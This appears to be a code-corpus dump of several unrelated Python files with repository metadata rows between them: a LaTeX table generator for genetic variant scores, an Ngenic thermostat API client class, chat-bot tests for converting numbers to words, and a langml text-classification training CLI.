outFile.write("&".join(row[0:3]) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample with gestalt score} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|c|c|c|c|c|} \\hline\n")
outFile.write("Case&Gene&FM&CADD&Gestalt&Boqa&Pheno\\\\ \\hline \n")
filename = "../sample.csv"
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
outrow = [j for i, j in enumerate(row) if i != 2]
if flag == 1 and row[5] != 'nan':
outFile.write("&".join(outrow) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample with gestalt score} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.close()
#####################################################################3
outFile = open(output_dir + 'sample_detail_no_g.tex', "w")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|c|c|c|c|c|}\n")
outFile.write("\\caption{Cases which has no gestalt score in pathogenic mutation gene} \n")
outFile.write("\\label{table:no_gestalt_sample} \\\\ \\hline \n")
outFile.write("Case&Gene&FM&CADD&Gestalt&Boqa&Pheno\\\\ \\hline \n")
filename = "../sample.csv"
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
outrow = [j for i, j in enumerate(row) if i != 2]
if flag == 1 and row[5] == 'nan':
outFile.write("&".join(outrow) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.close()
| 31.299465 | 91 | 0.599009 | 817 | 5,853 | 4.238678 | 0.135863 | 0.180191 | 0.138897 | 0.060064 | 0.866301 | 0.816922 | 0.816922 | 0.797286 | 0.797286 | 0.797286 | 0 | 0.010594 | 0.177516 | 5,853 | 186 | 92 | 31.467742 | 0.708766 | 0.079276 | 0 | 0.885714 | 1 | 0.014286 | 0.298013 | 0.085898 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028571 | 0 | 0.028571 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ba75cfa72a0a7a766fb14a4bae6f76eb4aa13480 | 98 | py | Python | scilifelab/utils/vcf.py | ssjunnebo/scilifelab | 79960f7042118f900bd1eaabe4902ee76abd8020 | [
"MIT"
] | 1 | 2016-03-21T14:04:09.000Z | 2016-03-21T14:04:09.000Z | scilifelab/utils/vcf.py | ssjunnebo/scilifelab | 79960f7042118f900bd1eaabe4902ee76abd8020 | [
"MIT"
] | 35 | 2015-01-22T08:25:02.000Z | 2020-02-17T12:09:12.000Z | scilifelab/utils/vcf.py | ssjunnebo/scilifelab | 79960f7042118f900bd1eaabe4902ee76abd8020 | [
"MIT"
] | 6 | 2015-01-16T15:32:08.000Z | 2020-01-30T14:34:40.000Z | """scilifelab vcf module"""
import os
def vcf_summary():
"""Do vcf_summary"""
pass
| 10.888889 | 27 | 0.591837 | 12 | 98 | 4.666667 | 0.75 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.255102 | 98 | 8 | 28 | 12.25 | 0.767123 | 0.367347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
ba924423bbd506a3b06b6a715a33c309b602553f | 4,211 | py | Python | ngenicpy/models/tune.py | parherman/ngenicpy | b4bd27c760adb14921d534f491263a5ecbf79abf | [
"MIT"
] | 6 | 2019-09-14T09:46:03.000Z | 2021-10-03T20:38:20.000Z | ngenicpy/models/tune.py | parherman/ngenicpy | b4bd27c760adb14921d534f491263a5ecbf79abf | [
"MIT"
] | 5 | 2019-12-19T07:31:55.000Z | 2021-02-01T19:23:02.000Z | ngenicpy/models/tune.py | parherman/ngenicpy | b4bd27c760adb14921d534f491263a5ecbf79abf | [
"MIT"
] | 4 | 2020-03-21T17:30:26.000Z | 2021-01-17T15:15:51.000Z | import json
from .base import NgenicBase
from .room import Room
from .node import Node
from ..const import API_PATH
class Tune(NgenicBase):
def __init__(self, session, json):
super(Tune, self).__init__(session=session, json=json)
def uuid(self):
"""Get the tune UUID"""
# If a tune was fetched with the list API, it contains "tuneUuid"
# If it was fetched directly (with UUID), it contains "uuid"
try:
return self["tuneUuid"]
except AttributeError:
return super().uuid()
def rooms(self):
"""List all Rooms associated with a Tune. A Room contains an indoor sensor.
:return:
a list of rooms
:rtype:
`list(~ngenic.models.room.Room)`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid="")
return self._parse_new_instance(url, Room, tune=self)
async def async_rooms(self):
"""List all Rooms associated with a Tune (async). A Room contains an indoor sensor.
:return:
a list of rooms
:rtype:
`list(~ngenic.models.room.Room)`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid="")
return await self._async_parse_new_instance(url, Room, tune=self)
def room(self, roomUuid):
"""Get data about a Room. A Room contains an indoor sensor.
:param str roomUuid:
(required) room UUID
:return:
the room
:rtype:
`~ngenic.models.room.Room`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid=roomUuid)
return self._parse_new_instance(url, Room, tune=self)
async def async_room(self, roomUuid):
"""Get data about a Room (async). A Room contains an indoor sensor.
:param str roomUuid:
(required) room UUID
:return:
the room
:rtype:
`~ngenic.models.room.Room`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid=roomUuid)
return await self._async_parse_new_instance(url, Room, tune=self)
async def async_room(self, roomUuid):
"""Get data about a Room (async). A Room contains an indoor sensor.
:param str roomUuid:
(required) room UUID
:return:
the room
:rtype:
`~ngenic.models.room.Room`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid=roomUuid)
return await self._async_parse_new_instance(url, Room, tune=self)
def nodes(self):
"""List all Nodes associated with a Tune. A Node is a logical network entity.
:return:
a list of nodes
:rtype:
`list(~ngenic.models.node.Node)`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid="")
return self._parse_new_instance(url, Node, tune=self)
async def async_nodes(self):
"""List all Nodes associated with a Tune (async). A Node is a logical network entity.
:return:
a list of nodes
:rtype:
`list(~ngenic.models.node.Node)`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid="")
return await self._async_parse_new_instance(url, Node, tune=self)
def node(self, nodeUuid):
"""Get data about a Node. A Node is a logical network entity.
:param str nodeUuid:
(required) node UUID
:return:
the node
:rtype:
`~ngenic.models.node.Node`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid=nodeUuid)
return self._parse_new_instance(url, Node, tune=self)
async def async_node(self, nodeUuid):
"""Get data about a Node (async). A Node is a logical network entity.
:param str nodeUuid:
(required) node UUID
:return:
the node
:rtype:
`~ngenic.models.node.Node`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid=nodeUuid)
return await self._async_parse_new_instance(url, Node, tune=self)
| 32.643411 | 93 | 0.588221 | 522 | 4,211 | 4.639847 | 0.12069 | 0.028902 | 0.037159 | 0.081751 | 0.854666 | 0.854666 | 0.854666 | 0.852601 | 0.807597 | 0.741536 | 0 | 0 | 0.299691 | 4,211 | 128 | 94 | 32.898438 | 0.821295 | 0.183092 | 0 | 0.5 | 0 | 0 | 0.02519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.125 | 0 | 0.575 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
babfd80dac481794c0354a430e6b988127baacaa | 4,624 | py | Python | hallo/test/modules/math/test_number_word.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2022-01-27T13:25:01.000Z | 2022-01-27T13:25:01.000Z | hallo/test/modules/math/test_number_word.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/math/test_number_word.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | from hallo.events import EventMessage
def test_number_simple(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "five." == data[0].text, "Number word failing for small numbers."
def test_number_big(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 295228")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"two hundred and ninety-five thousand, two hundred and twenty-eight."
== data[0].text.lower()
)
def test_number_teen(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 17")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"seventeen." == data[0].text.lower()
), "Number word failing for 'teen' numbers."
def test_number_negative(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number -502")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"negative five hundred and two." == data[0].text.lower()
), "Number word failing for negative numbers."
def test_number_float(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 2.3")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"two point three" in data[0].text.lower()
), "Number word failing for non-integers."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 2.357")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"two point three five seven." == data[0].text.lower()
), "Number word failing for non-integers."
def test_number_american(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 1000000000 american")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"one billion." == data[0].text.lower()
), "Number word failing for american formatting."
def test_number_british(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 1000000000 british")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"one thousand million." == data[0].text.lower()
), "Number word failing for british formatting."
def test_number_european(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 1000000000 european")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"one milliard." == data[0].text.lower()
), "Number word failing for european formatting."
def test_number_calculation(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 17*5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"eighty-five." == data[0].text.lower()
), "Number word failing for calculations."
def test_number_fail(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number seventeen")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"error" in data[0].text.lower()
), "Number word not outputting error for non-numeric input."
| 39.186441 | 102 | 0.718209 | 616 | 4,624 | 5.095779 | 0.12013 | 0.186365 | 0.182224 | 0.133163 | 0.809493 | 0.809493 | 0.809493 | 0.800573 | 0.735585 | 0.735585 | 0 | 0.01902 | 0.169983 | 4,624 | 117 | 103 | 39.521368 | 0.798854 | 0 | 0 | 0.453608 | 0 | 0 | 0.181445 | 0 | 0 | 0 | 0 | 0 | 0.113402 | 1 | 0.103093 | false | 0 | 0.010309 | 0 | 0.113402 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2400d04e5a116d3d0ced28f679899b364386ffd1 | 21,164 | py | Python | langml/langml/baselines/clf/cli.py | 4AI/TDEER | 81d3b3457e5308547d7d6695b31193bb34d98223 | [
"MIT"
] | 26 | 2021-11-07T12:04:11.000Z | 2022-03-25T09:49:14.000Z | langml/langml/baselines/clf/cli.py | alipay/TDEER | 8df3a9b758e06c48f507668e12702df640f740bc | [
"MIT"
] | 4 | 2021-12-22T02:44:30.000Z | 2022-03-07T06:14:42.000Z | langml/langml/baselines/clf/cli.py | 4AI/TDEER | 81d3b3457e5308547d7d6695b31193bb34d98223 | [
"MIT"
] | 6 | 2021-11-11T12:09:22.000Z | 2022-01-20T06:13:19.000Z | # -*- coding: utf-8 -*-
import os
import json
from typing import Optional
from shutil import copyfile
import click
from langml import TF_VERSION, TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
else:
import keras
import keras.backend as K
from langml.log import info
from langml.baselines import Parameters
from langml.baselines.clf import Infer, compute_detail_metrics
from langml.baselines.clf.dataloader import load_data, DataGenerator, TFDataGenerator
from langml.model import save_frozen
from langml.tokenizer import WPTokenizer, SPTokenizer
MONITOR = 'val_accuracy' if not TF_KERAS or TF_VERSION > 1 else 'val_acc'
@click.group()
def clf():
"""classification command line tools"""
pass
@clf.command()
@click.option('--backbone', type=str, default='bert',
help='specify backbone: bert | roberta | albert')
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=2e-5, help='learning rate')
@click.option('--max_len', type=int, default=512, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--config_path', type=str, required=True, help='bert config path')
@click.option('--ckpt_path', type=str, required=True, help='bert checkpoint path')
@click.option('--vocab_path', type=str, required=True, help='bert vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bert(backbone: str, epoch: int, batch_size: int, learning_rate: float, max_len: Optional[int],
lowercase: bool, tokenizer_type: Optional[str], early_stop: int, use_micro: bool,
config_path: str, ckpt_path: str, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.bert import Bert
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model(lazy_restore=True)
else:
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=True)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--filter_size', type=int, default=100, help='filter size of convolution')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def textcnn(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
filter_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.textcnn import TextCNN
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'filter_size': filter_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = TextCNN(params).build_model()
else:
model = TextCNN(params).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = TextCNN(params).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--hidden_size', type=int, default=128, help='hidden size of lstm')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--with_attention', is_flag=True, default=False, help='apply bilstm attention')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bilstm(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
hidden_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, with_attention: bool, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.bilstm import BiLSTM as BiLSTM
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'hidden_size': hidden_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = BiLSTM(params).build_model(with_attention=with_attention)
else:
model = BiLSTM(params).build_model(with_attention=with_attention)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = BiLSTM(params).build_model(with_attention=with_attention)
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
